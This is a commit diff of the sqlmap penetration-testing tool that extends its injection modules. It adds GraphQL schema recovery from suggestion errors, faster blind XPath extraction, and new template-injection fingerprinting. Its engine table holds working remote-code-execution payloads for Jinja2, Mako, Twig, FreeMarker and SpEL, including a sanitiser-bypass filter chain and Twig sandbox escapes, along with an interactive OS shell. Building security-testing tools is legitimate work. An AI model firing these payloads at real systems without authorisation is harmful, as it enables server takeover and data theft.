Minor improvements

This commit is contained in:
Miroslav Štampar 2026-06-29 22:20:22 +02:00
parent 820efa7a8a
commit 7b60bc8284
11 changed files with 626 additions and 104 deletions

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.6.190"
VERSION = "1.10.6.191"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -878,7 +878,15 @@ NOSQL_MAX_RECORDS = 100
NOSQL_MAX_LENGTH = 1024
# GraphQL endpoint paths to probe when the user supplies a base URL with --graphql (no explicit /graphql)
GRAPHQL_ENDPOINT_PATHS = ("/graphql", "/api/graphql", "/v1/graphql", "/graphql/api", "/graph", "/gql")
GRAPHQL_ENDPOINT_PATHS = ("/graphql", "/api/graphql", "/v1/graphql", "/api/v1/graphql", "/graphql/api", "/graphql/console", "/graphql.php", "/graphiql", "/graph", "/gql", "/query")
# Seed field/argument names used to recover a GraphQL schema from "Did you mean" suggestion error
# messages when introspection is disabled (the field-suggestion / "Clairvoyance" technique)
GRAPHQL_FIELD_WORDLIST = ("user", "users", "me", "search", "login", "node", "post", "posts",
"account", "accounts", "profile", "product", "products", "order", "orders", "item", "items",
"customer", "find", "get", "list", "comment", "comments", "message", "messages", "updateUser")
GRAPHQL_ARG_WORDLIST = ("id", "username", "user", "name", "term", "query", "q", "search",
"email", "input", "password", "key", "filter", "slug", "title", "uid")
# Canonical GraphQL introspection query (the one everyone copy-pastes). Returned schema carries the
# full type system: query/mutation/subscription roots, OBJECT/INPUT_OBJECT/ENUM/SCALAR types, their
@ -967,6 +975,9 @@ LDAP_CHAR_MAX = 0x7e
# Upper bound for the value-length search during LDAP blind extraction
LDAP_MAX_LENGTH = 256
# Maximum number of directory entries enumerated during LDAP blind dumping
LDAP_MAX_RECORDS = 20
# Attributes that definitively identify the backend vendor when probed on the RootDSE or
# a well-known directory entry. Each tuple is (attribute, expected_value_substring, backend).
LDAP_FINGERPRINT_ATTRIBUTES = (

View file

@ -22,8 +22,10 @@ from lib.core.data import logger
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import POST_HINT
from lib.core.settings import ERROR_PARSING_REGEXES
from lib.core.settings import GRAPHQL_ARG_WORDLIST
from lib.core.settings import GRAPHQL_ENDPOINT_PATHS
from lib.core.settings import GRAPHQL_ERROR_REGEX
from lib.core.settings import GRAPHQL_FIELD_WORDLIST
from lib.core.settings import GRAPHQL_INTROSPECTION_QUERY
from lib.core.settings import NOSQL_ERROR_REGEX
from lib.core.settings import UPPER_RATIO_BOUND
@ -354,6 +356,90 @@ def _introspect(endpoint):
return None
# --- Schema recovery via field suggestions (introspection disabled) ---------
def _gqlErrors(page):
# GraphQL error-envelope messages as a list of strings
doc = _parseJSON(page)
if not isinstance(doc, dict):
return []
return [getUnicode(e.get("message", "")) for e in (doc.get("errors") or []) if isinstance(e, dict)]
def _harvestSuggestions(message):
# Pull suggested identifiers out of a "Did you mean ..." GraphQL validation message,
# handling both single- and double-quoted phrasings ('a', 'b', or 'c' / "a" or "b")
idx = message.find("Did you mean")
if idx < 0:
return []
return re.findall(r"""['"]([A-Za-z_][A-Za-z0-9_]*)['"]""", message[idx:])
def _suggestFields(endpoint, op):
# Recover root field names for an operation via suggestion harvesting: probe a random
# (guaranteed-unknown) field to collect the closest matches, then confirm/expand using a
# seed wordlist. A seed that does NOT come back as "Cannot query field" is itself a real field.
prefix = "" if op == "query" else "mutation "
found = set()
probes = [randomStr(length=10, lowercase=True)] + list(GRAPHQL_FIELD_WORDLIST)
for seed in probes:
page, _ = _gqlSend(endpoint, "%s{ %s }" % (prefix, seed))
doc = _parseJSON(page) or {}
for entry in (doc.get("errors") or []):
message = getUnicode(entry.get("message", "")) if isinstance(entry, dict) else ""
if "Did you mean" in message and "on type" in message:
found.update(_harvestSuggestions(message))
# a seeded name counts as a real field only if it actually resolved (appears in `data`);
# "no unknown-field error" alone is too weak (lenient servers accept anything)
data = doc.get("data")
if seed in GRAPHQL_FIELD_WORDLIST and isinstance(data, dict) and seed in data:
found.add(seed)
return sorted(found)
def _suggestArgs(endpoint, op, field):
# Recover an argument name for `field` from an "Unknown argument ... Did you mean ..." message
prefix = "" if op == "query" else "mutation "
bogus = randomStr(length=10, lowercase=True)
page, _ = _gqlSend(endpoint, '%s{ %s(%s: 1) }' % (prefix, field, bogus))
found = set()
for message in _gqlErrors(page):
if "Unknown argument" in message:
found.update(_harvestSuggestions(message))
return sorted(found)
def _introspectViaSuggestions(endpoint):
# Fallback schema recovery when introspection is disabled but the server still leaks field/argument
# names through "Did you mean" validation errors. Builds best-effort Slots: known scalar arg types
# are unavailable here, so we default to the 'string' strategy (the most broadly injectable) and let
# the per-slot injection oracle confirm which (field, argument) pairs are actually vulnerable.
probe = randomStr(length=10, lowercase=True)
page, _ = _gqlSend(endpoint, "{ %s }" % probe)
if not any("Did you mean" in m for m in _gqlErrors(page)):
return None
logger.info("introspection is disabled; recovering the schema from field-suggestion errors")
slots = []
for op, parentName in (("query", "Query"), ("mutation", "Mutation")):
fields = _suggestFields(endpoint, op)
if not fields:
continue
logger.info("recovered %d %s field(s) via suggestions: %s" % (
len(fields), op, ", ".join(fields)))
for field in fields:
args = _suggestArgs(endpoint, op, field) or list(GRAPHQL_ARG_WORDLIST)
for arg in args:
# returnSel="" renders as "{ __typename }" (valid on any OBJECT); strategy="string"
slots.append(Slot(op, parentName, field, [(arg, {}, None)],
arg, "string", "OBJECT", "", ""))
return slots or None
# --- Schema walking ---------------------------------------------------------
def _extractSlots(schema):
@ -1087,11 +1173,11 @@ def graphqlScan():
global SENTINEL
SENTINEL = randomStr(length=10, lowercase=True)
infoMsg = "'--graphql' is self-contained: it discovers the GraphQL endpoint, "
infoMsg += "enumerates the schema, and injects SQL/NoSQL payloads into reachable "
infoMsg += "argument slots. SQL enumeration switches (e.g. --banner, --dbs, "
infoMsg += "--tables) are ignored"
logger.info(infoMsg)
debugMsg = "'--graphql' is self-contained: it discovers the GraphQL endpoint, "
debugMsg += "enumerates the schema, and injects SQL/NoSQL payloads into reachable "
debugMsg += "argument slots. SQL enumeration switches (e.g. --banner, --dbs, "
debugMsg += "--tables) are ignored"
logger.debug(debugMsg)
url = conf.url.rstrip("/") if conf.url else ""
@ -1120,19 +1206,22 @@ def graphqlScan():
# 2. Schema introspection
logger.info("introspecting the GraphQL schema")
schema = _introspect(endpoint)
if not schema:
logger.error("introspection failed (disabled or the endpoint rejected the query)")
return
types = schema.get("types") or []
logger.info("introspection returned %d types" % len(types))
# 3. Slot enumeration
slots = _extractSlots(schema)
if not slots:
logger.warning("no injectable argument slots found in the schema")
_dumpSchema(schema, endpoint)
return
if schema:
types = schema.get("types") or []
logger.info("introspection returned %d types" % len(types))
slots = _extractSlots(schema)
if not slots:
logger.warning("no injectable argument slots found in the schema")
_dumpSchema(schema, endpoint)
return
else:
# Introspection blocked: try to recover the schema from field-suggestion errors
logger.warning("introspection failed (disabled or rejected); trying suggestion-based recovery")
slots = _introspectViaSuggestions(endpoint)
if not slots:
logger.error("could not recover the schema (introspection disabled and no field suggestions)")
return
querySlots = [_ for _ in slots if _.operation == "query"]
mutationSlots = [_ for _ in slots if _.operation == "mutation"]
@ -1141,8 +1230,10 @@ def graphqlScan():
len(slots), len(querySlots), len(mutationSlots)))
# 4. Schema dump (before detection -- matches regular sqlmap table/column
# enumeration preceding data retrieval)
_dumpSchema(schema, endpoint)
# enumeration preceding data retrieval). Only when introspection succeeded; the
# suggestion-recovered path has no full schema document to render.
if schema:
_dumpSchema(schema, endpoint)
if mutationSlots:
names = sorted(set("%s(%s:)" % (_.fieldName, _.targetArg) for _ in mutationSlots))

View file

@ -24,15 +24,11 @@ from lib.core.settings import LDAP_ERROR_REGEX
from lib.core.settings import LDAP_ERROR_SIGNATURES
from lib.core.settings import LDAP_FINGERPRINT_ATTRIBUTES
from lib.core.settings import LDAP_MAX_LENGTH
from lib.core.settings import LDAP_MAX_RECORDS
from lib.core.settings import UPPER_RATIO_BOUND
from lib.request.connect import Connect as Request
from lib.utils.xrange import xrange
try:
from lib.core.settings import LDAP_MAX_RECORDS
except ImportError:
LDAP_MAX_RECORDS = 20
SENTINEL = randomStr(length=10, lowercase=True)
@ -644,10 +640,10 @@ def ldapScan():
global SENTINEL
SENTINEL = randomStr(length=10, lowercase=True)
infoMsg = "'--ldap' is self-contained: it detects LDAP injection in HTTP "
infoMsg += "parameters and dumps reachable directory entries. SQL enumeration "
infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
logger.info(infoMsg)
debugMsg = "'--ldap' is self-contained: it detects LDAP injection in HTTP "
debugMsg += "parameters and dumps reachable directory entries. SQL enumeration "
debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
logger.debug(debugMsg)
if not conf.paramDict:
logger.error("no request parameters to test (use --data, GET params, or similar)")

View file

@ -684,10 +684,10 @@ def nosqlScan():
# NoSQL injection from an application-scoped point is confined to the back-end's single query
# (one collection/label) - it confirms and dumps what that query can reach, with no analog to the
# SQL database/table/user/banner enumeration, so those switches do not apply here
infoMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable "
infoMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, "
infoMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored"
logger.info(infoMsg)
debugMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable "
debugMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, "
debugMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored"
logger.debug(debugMsg)
tested = found = 0

View file

@ -53,7 +53,23 @@ Engine = namedtuple("Engine", (
def _arithmeticPayload(fmt, a, b):
return fmt % (a, b)
# Substitute the two operands into the first two %d tokens by literal replacement rather than
# %-formatting: some engines' delimiters contain a literal '%' (e.g. ERB '<%= ... %>'), where
# fmt % (a, b) raises ValueError and would silently disable arithmetic detection for them.
return fmt.replace("%d", str(a), 1).replace("%d", str(b), 1)
def _expressionPayload(fmt, value):
# Same rationale as _arithmeticPayload(): literal %s substitution so '%'-delimited engines
# (notably ERB) can wrap expressions instead of crashing on fmt % value.
return fmt.replace("%s", value, 1)
def _degroup(text):
# Strip digit-group (thousands) separators so an arithmetic result still matches when the
# engine formats large numbers with grouping (e.g. FreeMarker renders 234*567 as "132,678").
# Only separators sitting between digits are removed, so ordinary text is untouched.
return re.sub(u"(?<=\\d)[,\u00a0\u202f\u2009']" + u"(?=\\d)", "", getUnicode(text))
_ENGINE_TABLE = (
@ -66,10 +82,24 @@ _ENGINE_TABLE = (
"{{ True }}", "{{ False }}", "True", "False",
None, None, # Jinja2/Twig distinguished by trueRendered ("True"/"False" vs "1"/"")
"{{ %s }}",
# Jinja2: try multiple RCE paths in order (cycler -> config -> lipsum)
# Jinja2: try multiple RCE paths in order (cycler -> config -> lipsum -> attr()-chain).
# The last one is dot-/underscore-free (filters + \x5f-escaped dunders), bypassing
# sanitisers that block '.'/'_' (the CVE-2025-23211 Tandoor technique).
(("{{ cycler.__init__.__globals__.os.popen('{CMD}').read() }}", "cycler.__globals__"),
("{{ config.from_envvar.__globals__.__builtins__.__import__('os').popen('{CMD}').read() }}", "config.from_envvar chain"),
("{{ lipsum.__globals__.os.popen('{CMD}').read() }}", "lipsum.__globals__"))),
("{{ lipsum.__globals__.os.popen('{CMD}').read() }}", "lipsum.__globals__"),
("{{ cycler|attr('\\x5f\\x5finit\\x5f\\x5f')|attr('\\x5f\\x5fglobals\\x5f\\x5f')|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('os')|attr('popen')('{CMD}')|attr('read')() }}", "attr() filter chain (dot/underscore-free)"))),
Engine("Mako", "python",
"${", "}",
r"(?i)(?:mako\.exceptions\.\w+|mako\.runtime|CompileException|SyntaxException)",
("${", "${}", "<%", "<%!"),
"${%d*%d}", "",
"${True}", "${False}", "True", "False",
None, None, # capital True/False uniquely identifies Mako within the ${ } family (Freemarker/Spring render lowercase true/false)
"${%s}",
# Mako: popen captures output; self.module.runtime path needs no <%import%> preamble
(("${self.module.runtime.util.os.popen('{CMD}').read()}", "self.module.runtime.util.os.popen"),
("<%import os%>${os.popen('{CMD}').read()}", "import os + popen"))),
# -- PHP ----------------------------------------------------------------------------------------------
Engine("Twig", "php",
"{{", "}}",
@ -77,20 +107,29 @@ _ENGINE_TABLE = (
("{{", "{{ }}", "{{ unknown|filter }}"),
"{{ %d*%d }}", "{{ (%d*%d)|raw }}",
"{{ true }}", "{{ false }}", "1", "",
"{{ _self }}", "Twig_Template",
# '_self' renders 'Twig_Template' (Twig 1) or '__string_template__...' (Twig 2/3);
# 'emplate' is the substring common to both, so the probe is version-stable
"{{ _self }}", "emplate",
"{{ %s }}",
# Twig: try system -> exec -> shell_exec fallbacks
# Twig: filter() chain first; then sort()/map() callbacks, which double as classic
# sandbox escapes when 'filter' is not on the policy allow-list (DEEP1 Phishtale)
(("{{ ['{CMD}']|filter('system') }}", "filter('system')"),
("{{ ['{CMD}']|filter('exec') }}", "filter('exec')"),
("{{ ['{CMD}']|filter('shell_exec') }}", "filter('shell_exec')"))),
("{{ ['{CMD}']|filter('shell_exec') }}", "filter('shell_exec')"),
("{{ ['{CMD}', '']|sort('system')|join }}", "sort('system') sandbox escape"),
("{{ ['{CMD}']|map('system')|join }}", "map('system') sandbox escape"))),
# -- Java ---------------------------------------------------------------------------------------------
Engine("Freemarker", "java",
"${", "}",
r"(?i)(?:freemarker\.(?:core|template|extract|cache)\.\w+|ParseException|InvalidReferenceException|TemplateException)",
("${", "${}", "<#if ", "<#--"),
"${%d*%d}", "${(%d*%d)?no_esc}",
"${true}", "${false}", "true", "false",
"<#-- freemarker -->", "",
# modern FreeMarker errors on a bare ${true} ("boolean_format"); ?c gives the
# computer-format "true"/"false" string, so the boolean oracle works on real FreeMarker
"${true?c}", "${false?c}", "true", "false",
# Freemarker '?builtin' syntax (SpEL/Thymeleaf can't parse '?upper_case' -> errors there),
# giving an intrinsic, non-empty discriminator from Spring within the shared '${ }' family
'${"sstimark"?upper_case}', "SSTIMARK",
"${%s}",
# Freemarker: classic -> indirect-assign fallback
(("${'freemarker.template.utility.Execute'?new()('{CMD}')}", "Execute?new"),
@ -118,9 +157,15 @@ _ENGINE_TABLE = (
("${", "${}", "#{", "*{"),
"${%d*%d}", "",
"${true}", "${false}", "true", "false",
"${#request}", "",
# SpEL Java method call (Freemarker uses '?upper_case', not '.toUpperCase()' -> errors
# there), giving an intrinsic, non-empty discriminator from Freemarker in '${ }'
"${'sstimark'.toUpperCase()}", "SSTIMARK",
"${%s}",
(("${T(java.lang.Runtime).getRuntime().exec('{CMD}')}", "T(Runtime).exec"),)),
# SpEL: read the process stdout (so output is captured, not just a Process object);
# then a blind exec; then the OGNL form for engines that parse OGNL instead of SpEL
(("${new java.io.BufferedReader(new java.io.InputStreamReader(T(java.lang.Runtime).getRuntime().exec('{CMD}').getInputStream())).readLine()}", "SpEL readLine (output)"),
("${T(java.lang.Runtime).getRuntime().exec('{CMD}')}", "T(Runtime).exec (blind)"),
("${(#rt=@java.lang.Runtime@getRuntime()).exec('{CMD}')}", "OGNL @Runtime@getRuntime (blind)"))),
# -- Ruby ---------------------------------------------------------------------------------------------
Engine("ERB", "ruby",
"<%=", "%>",
@ -302,8 +347,12 @@ def _probeArithmetic(place, parameter, engine):
if p1 in text1 or p2 in text2:
continue
# Match against a digit-group-stripped copy so a grouped result (e.g. FreeMarker's
# "132,678") still counts; the raw-reflection check above stays on the original text.
norm1, norm2 = _degroup(text1), _degroup(text2)
# Each result must appear in its own response and NOT in the other
if result1 in text1 and result2 not in text1 and result2 in text2 and result1 not in text2:
if result1 in norm1 and result2 not in norm1 and result2 in norm2 and result1 not in norm2:
return True
return False
@ -326,6 +375,43 @@ def _probeError(place, parameter, engine):
return None
# A divide-by-zero error is language-family specific, which separates engines that SHARE a
# delimiter but run on different runtimes (Jinja2/Python vs Twig/PHP in '{{ }}', or Mako/Python
# vs Freemarker/Spring/Java in '${ }'). Matching is case-SENSITIVE so Python's lowercase
# 'division by zero' is not confused with PHP's capitalised 'Division by zero'. JS is omitted on
# purpose: 1/0 yields Infinity there rather than an error, so it carries no family signal.
_FAMILY_DIVZERO = (
("python", re.compile(r"division by zero")),
("ruby", re.compile(r"divided by 0")),
("php", re.compile(r"DivisionByZeroError|Division by zero")),
("java", re.compile(r"ArithmeticException|/ by zero")),
)
def _probeFamily(place, parameter, engine, cache):
"""Inject a divide-by-zero inside the engine's delimiter and infer the backend language
family from the resulting error. Returns the family string or None. Responses are cached by
payload so engines that share a delimiter ('{{1/0}}' etc.) cost a single request."""
if not engine.arithmeticFmt or not engine.delimiterClose:
return None
payload = (_originalValue(place, parameter) or "") + engine.delimiter + "1/0" + engine.delimiterClose
if payload not in cache:
cache[payload] = _send(place, parameter, payload)
page = cache[payload]
if not page:
return None
text = getUnicode(page)
if payload in text: # raw reflection -> template did not execute it
return None
for family, regex in _FAMILY_DIVZERO:
if regex.search(text):
return family
return None
def _probeDistinguishing(place, parameter, engine):
"""Send the engine-specific fingerprint probe and verify the response.
For probes with a non-empty expected result, the result must appear and the
@ -391,17 +477,26 @@ def _booleanUniquelyIdentifies(engine):
return count == 1
def _familyUniquelyIdentifies(engine):
"""Returns True when the engine's language family is unique among engines sharing the
same delimiter, so a divide-by-zero family probe is enough to name it exactly."""
siblings = [e for e in _ENGINE_TABLE if e.delimiter == engine.delimiter]
return sum(e.family == engine.family for e in siblings) == 1
def _fingerprint(place, parameter):
"""Identify the template engine and confirm injection. Returns (engine, evidence)
where evidence is a dict of detection results, or (None, None).
Scoring: arithmetic(3) + boolean(2) + error(1) + distinguishing(2).
Engines sharing delimiters require error, distinguishing, or unique boolean
rendering evidence to be named exactly; otherwise they are reported as family/probable."""
Scoring: arithmetic(3) + boolean(2) + error(1) + distinguishing(2) + family(1).
Engines sharing delimiters require error, distinguishing, unique boolean rendering, or a
uniquely-identifying language family to be named exactly; otherwise they are reported as
family/probable."""
bestEngine = None
bestEvidence = None
bestScore = 0
divZeroCache = {}
for engine in _ENGINE_TABLE:
evidence = {}
@ -429,6 +524,11 @@ def _fingerprint(place, parameter):
evidence["distinguishing"] = True
score += 2
# Phase 5: language-family confirmation via divide-by-zero error class
if _probeFamily(place, parameter, engine, divZeroCache) == engine.family:
evidence["family"] = True
score += 1
if score > bestScore:
bestScore = score
bestEngine = engine
@ -440,12 +540,13 @@ def _fingerprint(place, parameter):
# or boolean rendering is unique within the delimiter family.
_FAMILY = {
"{{": "Jinja2/Twig/Handlebars-like",
"${": "Freemarker/SpringEL-like",
"${": "Freemarker/SpringEL/Mako-like",
}
if bestEngine.delimiter in _FAMILY:
if (bestEvidence.get("error") or
bestEvidence.get("distinguishing") or
(bestEvidence.get("boolean") and _booleanUniquelyIdentifies(bestEngine))):
(bestEvidence.get("boolean") and _booleanUniquelyIdentifies(bestEngine)) or
(bestEvidence.get("family") and _familyUniquelyIdentifies(bestEngine))):
pass # specific engine name stands
else:
bestEngine = bestEngine._replace(
@ -474,10 +575,10 @@ def sstiScan():
global SENTINEL
SENTINEL = randomStr(length=10, lowercase=True)
infoMsg = "'--ssti' is self-contained: it detects SSTI and fingerprints "
infoMsg += "common template engines when possible. SQL enumeration "
infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
logger.info(infoMsg)
debugMsg = "'--ssti' is self-contained: it detects SSTI and fingerprints "
debugMsg += "common template engines when possible. SQL enumeration "
debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
logger.debug(debugMsg)
if not conf.paramDict:
logger.error("no request parameters to test (use --data, GET params, or similar)")
@ -502,7 +603,7 @@ def sstiScan():
beep()
if engine.arithmeticFmt:
payload = _originalValue(place, parameter) + (engine.arithmeticFmt % (7, 7))
payload = _originalValue(place, parameter) + _arithmeticPayload(engine.arithmeticFmt, 7, 7)
else:
payload = _originalValue(place, parameter) + engine.booleanTrue
title = "SSTI %s injection" % engine.name
@ -530,18 +631,27 @@ def sstiScan():
if found:
slot = found[0]
place, parameter, engine, evidence = slot
from lib.core.common import readInput
wantsTakeover = any(conf.get(_) for _ in ("osCmd", "osShell", "sstiQuery", "sstiShell"))
# If the user did not ask for exploitation, confirm (benignly) whether OS command
# execution is reachable and, if so, advise the relevant switches.
if not wantsTakeover and _canTakeover(engine, evidence) and _probeRce(place, parameter, engine):
logger.info("the back-end '%s' allows OS command execution via this injection; "
"you are advised to try '--os-shell' (interactive) or "
"'--os-cmd=<command>' (single command)" % engine.name)
# --ssti-query: user-provided expression evaluated in-band
if conf.get("sstiQuery"):
_evalExpression(place, parameter, engine, conf.sstiQuery)
# --ssti-shell: interactive expression evaluation loop
# --ssti-shell: interactive expression evaluation loop (interactive even under --batch,
# like sqlmap's SQL --sql-shell/--os-shell, which read straight from the terminal)
if conf.get("sstiShell"):
infoMsg = "calling SSTI shell. Enter expressions (e.g. 7*7) or 'exit'/'quit' to leave"
logger.info(infoMsg)
from lib.core.common import readInput
logger.info("calling SSTI shell. Enter expressions (e.g. 7*7) or 'exit'/'quit' to leave")
while True:
expr = readInput("ssti-shell> ")
expr = readInput("ssti-shell> ", checkBatch=False)
if not expr or expr.strip().lower() in ("exit", "quit"):
break
_evalExpression(place, parameter, engine, expr.strip())
@ -555,18 +665,15 @@ def sstiScan():
if conf.get("osCmd"):
_executeCommand(place, parameter, engine, conf.osCmd)
# Interactive shell runs even under --batch (mirrors the SQL --os-shell, which
# reads commands straight from the terminal); EOF / 'exit' / 'quit' leaves it.
if conf.get("osShell"):
if conf.get("batch"):
logger.info("skipping interactive OS shell in batch mode")
else:
infoMsg = "calling SSTI OS shell. Enter commands or 'exit'/'quit' to leave"
logger.info(infoMsg)
from lib.core.common import readInput
while True:
cmd = readInput("os-shell> ")
if not cmd or cmd.strip().lower() in ("exit", "quit"):
break
_executeCommand(place, parameter, engine, cmd.strip())
logger.info("calling SSTI OS shell. Enter commands or 'exit'/'quit' to leave")
while True:
cmd = readInput("os-shell> ", checkBatch=False)
if not cmd or cmd.strip().lower() in ("exit", "quit"):
break
_executeCommand(place, parameter, engine, cmd.strip())
logger.info("SSTI scan complete")
@ -590,9 +697,9 @@ def _evalExpression(place, parameter, engine, expr):
# Three-part payload: marker, expression, marker -- each in its own template tag
# so the expression is evaluated independently of the markers
payload = original + (engine.expressionFmt % ("'%s'" % startMarker))
payload += " " + (engine.expressionFmt % expr)
payload += " " + (engine.expressionFmt % ("'%s'" % endMarker))
payload = original + _expressionPayload(engine.expressionFmt, "'%s'" % startMarker)
payload += " " + _expressionPayload(engine.expressionFmt, expr)
payload += " " + _expressionPayload(engine.expressionFmt, "'%s'" % endMarker)
page = _send(place, parameter, payload)
if not page:
@ -638,6 +745,24 @@ def _canTakeover(engine, evidence):
return True
def _probeRce(place, parameter, engine):
"""Benign, quiet RCE-capability check: run `echo <marker>` via the engine's RCE payloads and
return True if the marker is reflected (proving OS command execution is reachable). Used only
to advise the user; it has no side effect beyond echoing a random token."""
if not engine.rcePayloads:
return False
marker = randomStr(length=12, lowercase=True)
original = _originalValue(place, parameter) or ""
for payloadTemplate, _description in engine.rcePayloads:
payload = payloadTemplate.replace("{CMD}", "echo %s" % marker)
page = _send(place, parameter, original + payload)
if page and marker in getUnicode(page):
return True
return False
def _executeCommand(place, parameter, engine, cmd):
"""Execute an OS command via the engine's RCE payloads, trying each fallback
in order until one produces output. Captures output via baseline diff."""

View file

@ -308,6 +308,20 @@ class _XPathPayloadBuilder(object):
def textStartsWith(self, path, prefix):
return self._make("starts-with(string(%s),%s)" % (path, _xpathQuote(prefix)))
def stringLengthAtLeast(self, target, n):
return self._make("string-length(%s)>=%d" % (target, n))
def charPresent(self, target, pos):
# True when the character at 1-based position `pos` of `target` belongs to
# the known ordered charset (so its index can be resolved by bisection).
return self._make("contains(%s,substring(%s,%d,1))" % (_CS_LITERAL, target, pos))
def charIndexAtLeast(self, target, pos, n):
# The 0-based index of a charset member equals the length of the charset
# prefix preceding it (XPath 1.0 has no lexicographic '<', but
# string-length(substring-before(...)) yields a number we can bisect on).
return self._make("string-length(substring-before(%s,substring(%s,%d,1)))>=%d" % (_CS_LITERAL, target, pos, n))
def _makeOracle(place, parameter, template):
"""Build an oracle from a verified true template. extract(payload) returns
@ -360,6 +374,11 @@ for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1):
if _ not in _META_ORDS and _ not in _CHARSET:
_CHARSET.append(_)
# Codepoint-ordered charset used by the binary-search extractor. Ordering here MUST match
# the literal string `_CS_LITERAL` so that a recovered index maps back to the right character.
_CS_ORDS = [_ for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1) if _ not in _META_ORDS]
_CS_LITERAL = _xpathQuote("".join(chr(_) for _ in _CS_ORDS))
def _inferValue(oracle, builder, path, getter, maxLen=XPATH_MAX_LENGTH):
"""Blindly infer a string value at `path` using `getter(builder, path, prefix)`.
@ -407,6 +426,52 @@ def _inferCount(oracle, builder, path, countFn, maxCount=128):
return lo
def _inferString(oracle, builder, target, maxLen=XPATH_MAX_LENGTH):
"""Blindly recover the string value of XPath expression `target` (e.g.
"name(/*)" or "string(/*[1]/@*[1])") using binary search.
The length is bisected first, then each character is resolved by bisecting
its index inside the ordered charset. This needs ~log2(len) requests per
character versus the linear charset scan in _inferValue(), which matters a
lot when walking a whole document tree. Characters outside the charset are
surfaced as '?' so the rest of the value is still recovered."""
if not oracle.extract(builder.stringLengthAtLeast(target, 1)):
return None
lo, hi = 1, maxLen
while lo < hi:
mid = (lo + hi + 1) // 2
if oracle.extract(builder.stringLengthAtLeast(target, mid)):
lo = mid
else:
hi = mid - 1
length = lo
chars = []
probes = 0
last = len(_CS_ORDS) - 1
for pos in xrange(1, length + 1):
probes += 1
if not oracle.extract(builder.charPresent(target, pos)):
chars.append("?")
continue
clo, chi = 0, last
while clo < chi:
cmid = (clo + chi + 1) // 2
probes += 1
if oracle.extract(builder.charIndexAtLeast(target, pos, cmid)):
clo = cmid
else:
chi = cmid - 1
chars.append(chr(_CS_ORDS[clo]))
value = "".join(chars)
logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, length))
return value or None
def _walkTree(oracle, builder, path="/*", depth=0):
"""Recursively walk the XML tree from a given XPath expression.
Returns a dict: {name, path, children, attributes, text} or None."""
@ -414,8 +479,7 @@ def _walkTree(oracle, builder, path="/*", depth=0):
if depth > XPATH_MAX_DEPTH:
return None
name = _inferValue(oracle, builder, path,
lambda b, p, prefix: b.nameStartsWith(p, prefix))
name = _inferString(oracle, builder, "name(%s)" % path)
if not name:
return None
@ -431,20 +495,17 @@ def _walkTree(oracle, builder, path="/*", depth=0):
attributes = []
for i in xrange(1, attrCount + 1):
attrName = _inferValue(oracle, builder, path,
lambda b, p, prefix, idx=i: b.attributeNameStartsWith(p, idx, prefix))
attrName = _inferString(oracle, builder, "name(%s/@*[%d])" % (path, i))
if not attrName:
continue
attrValue = _inferValue(oracle, builder, path,
lambda b, p, prefix, idx=i: b.attributeValueStartsWith(p, idx, prefix))
attrValue = _inferString(oracle, builder, "string(%s/@*[%d])" % (path, i))
attributes.append({"name": attrName, "value": attrValue or ""})
logger.info(" attribute: @%s='%s'" % (attrName, attrValue or ""))
text = None
if childCount == 0:
text = _inferValue(oracle, builder, path,
lambda b, p, prefix: b.textStartsWith(p, prefix))
text = _inferString(oracle, builder, "string(%s)" % path)
children = []
for i in xrange(1, childCount + 1):
@ -511,10 +572,10 @@ def xpathScan():
global SENTINEL
SENTINEL = randomStr(length=10, lowercase=True)
infoMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP "
infoMsg += "parameters and walks the reachable XML document tree. SQL enumeration "
infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
logger.info(infoMsg)
debugMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP "
debugMsg += "parameters and walks the reachable XML document tree. SQL enumeration "
debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
logger.debug(debugMsg)
if not conf.paramDict:
logger.error("no request parameters to test (use --data, GET params, or similar)")